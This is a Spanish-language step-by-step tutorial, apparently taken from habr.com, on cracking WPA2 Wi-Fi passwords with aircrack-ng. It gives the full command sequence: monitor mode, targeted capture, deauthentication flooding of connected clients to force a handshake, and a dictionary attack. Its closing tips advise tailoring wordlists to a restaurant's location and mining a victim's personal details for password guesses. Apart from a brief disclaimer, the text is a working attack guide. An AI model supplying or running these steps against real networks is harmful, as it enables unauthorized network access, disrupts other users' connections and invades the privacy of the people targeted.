Este artículo está escrito únicamente con fines informativos y de investigación. Le instamos a que cumpla con las normas de redes y la ley, y recuerde siempre la seguridad de la información.
introducción
A principios de la década de 1990, cuando apareció Wi-Fi por primera vez, se creó el algoritmo Wired Equivalent Privacy, que se suponía garantizaría la confidencialidad de las redes Wi-Fi. Sin embargo, WEP ha demostrado ser un algoritmo de seguridad ineficaz y fácil de piratear.
Ha sido reemplazado por un nuevo algoritmo de protección Wi-Fi Protected Access II, que utilizan la mayoría de los puntos de acceso Wi-Fi en la actualidad. WPA2 utiliza un algoritmo de cifrado, AES, que es extremadamente difícil de descifrar.
¿Dónde está la vulnerabilidad?
La desventaja de WPA2 es que la contraseña cifrada se transmite cuando los usuarios se conectan durante el llamado protocolo de enlace de 4 vías. Si captamos un apretón de manos, sabremos la contraseña cifrada y todo lo que tendremos que hacer es descifrarla. Para ello utilizaremos aircrack-ng.
Entonces, ¿cómo se piratea?
Paso 1. Definir la interfaz
Primero debemos averiguar qué interfaz de red necesitamos, para ello ingresamos el comando:
$ ifconfigObtenemos la respuesta:
eth0 no wireless extensions.
wlan0 IEEE 802.11abgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=15 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
lo no wireless extensionsEn mi caso, sólo hay tres interfaces, dos de las cuales no tienen extensiones inalámbricas. Por lo tanto, sólo nos interesa wlan0.
Paso 2. Ponga el adaptador de red en modo de monitoreo
Poner el adaptador de red en modo de monitoreo nos permitirá ver el tráfico inalámbrico que se acerca a nosotros. Para hacer esto, ingrese el comando:
$ airmon-ng start wlan0Tenga en cuenta que airmon-ng ha cambiado el nombre de su interfaz (la mía ahora es mon0, pero aún así debe verificar).
Paso 3. Interceptar el tráfico
Ahora que nuestro adaptador de red está en modo de monitoreo, podemos capturar el tráfico que pasa usando el comando airodump-ng. Ingresar:
$ airodump-ng mon0 
Tenga en cuenta que todos los puntos de acceso visibles se enumeran en la parte superior de la pantalla y los clientes se enumeran en la parte inferior de la pantalla.
Paso 4. Concentrar la interceptación en un punto de acceso específico.
Nuestro siguiente paso es centrar nuestros esfuerzos en uno de los puntos de acceso y su canal. Nos interesa el BSSID y número de canal del punto de acceso que hackearemos. Abramos otra terminal e ingresemos:
$ airodump-ng --bssid 08:86:30:74:22:76 -c 6 -w WPAcrack mon0 
- 08:86:30:74:22:76 BSSID del punto de acceso
- -c canal 6 en el que opera el punto de acceso Wi-Fi
- Archivo WPAcrack en el que se registrará el protocolo de enlace
- adaptador de red mon0 en modo de monitoreo
Como puede ver en la captura de pantalla anterior, ahora nos estamos concentrando en capturar datos de un punto de acceso con ESSID Belkin276 en el canal 6. ¡Dejamos el terminal abierto!
Paso 5. Recibir un apretón de manos
Para capturar la contraseña cifrada, necesitamos que el cliente esté autenticado (conectado a Wi-Fi). Si ya está autenticado, podemos desautenticarlo (desconectarlo), luego el sistema se volverá a autenticar (conectar) automáticamente, lo que nos permitirá obtener la contraseña cifrada.
Es decir, simplemente necesitamos desconectar a los usuarios conectados para que se vuelvan a conectar. Para hacer esto, abra otra terminal e ingrese:
$ aireplay-ng --deauth 100 -a 08:86:30:74:22:76 mon0 
- 100 número de usuarios que serán desautenticados
- 08:86:30:74:22:76 BSSID del punto de acceso
- adaptador de red mon0
Ahora, cuando vuelvas a conectarte, la ventana que dejamos en el paso anterior captará el apretón de manos. Volvamos a nuestra terminal airodump-ng y echemos un vistazo.
Observe en la línea superior a la derecha, salida airodump-ng: “Handshake WPA”. Es decir, ¡hemos capturado con éxito la contraseña cifrada! ¡Este es el primer paso hacia el éxito!
Paso 6. Selecciona una contraseña
Ahora que tenemos la contraseña cifrada en nuestro archivo WPACrack, podemos ejecutar la adivinación de contraseña. Pero para ello necesitamos tener una lista de contraseñas que queremos utilizar. Puede encontrar una lista de este tipo en 5 minutos en Google. Sin embargo, usaré la lista de contraseñas predeterminada incluida en aircrack-ng: BackTrack darkcOde.
Abra una nueva terminal e ingrese:
$ aircrack-ng WPAcrack-01.cap -w /pentest/passwords/wordlists/darkc0de 
- Archivo WPACrack-01.cap en el que registramos el protocolo de enlace (airodump-ng agregó -01.cap al final)
- /pentest/passwords/wordlist/darkc0de ruta absoluta a la lista de contraseñas
¿Cuánto tiempo tardará?
Este proceso puede llevar mucho tiempo. Todo depende de la longitud de tu lista de contraseñas, puedes esperar desde unos minutos hasta unos días. En mi procesador Intel de doble núcleo, aircrack-ng adivina poco más de 800 contraseñas por segundo.
Cuando se encuentre la contraseña, aparecerá en su pantalla. El éxito o no de la adivinación de la contraseña depende de su lista. Si no pudo adivinar la contraseña usando una lista, no se desespere, pruebe con otra.
Consejos de uso
- Este tipo de ataque es eficaz para adivinar una contraseña a partir de una lista, pero es prácticamente inútil para adivinar al azar. Todo es cuestión de tiempo. Si Wi-Fi está protegido con una contraseña promedio de letras y números latinos, la selección aleatoria llevará varios años.
- Al elegir una lista de contraseñas, asegúrese de considerar factores geográficos. Por ejemplo, no tiene sentido hacer una selección en un restaurante de París utilizando una lista rusa de contraseñas.
- Si está pirateando la red Wi-Fi de su hogar, intente averiguar los datos personales de la víctima (nombre, apellido, fecha de nacimiento, nombre del perro, etc.) y genere una lista adicional de contraseñas a partir de estos datos.
- Después de recibir un apretón de manos, desactive aireplay-ng (no haga sufrir a los usuarios comunes).
Fuente: habr.com
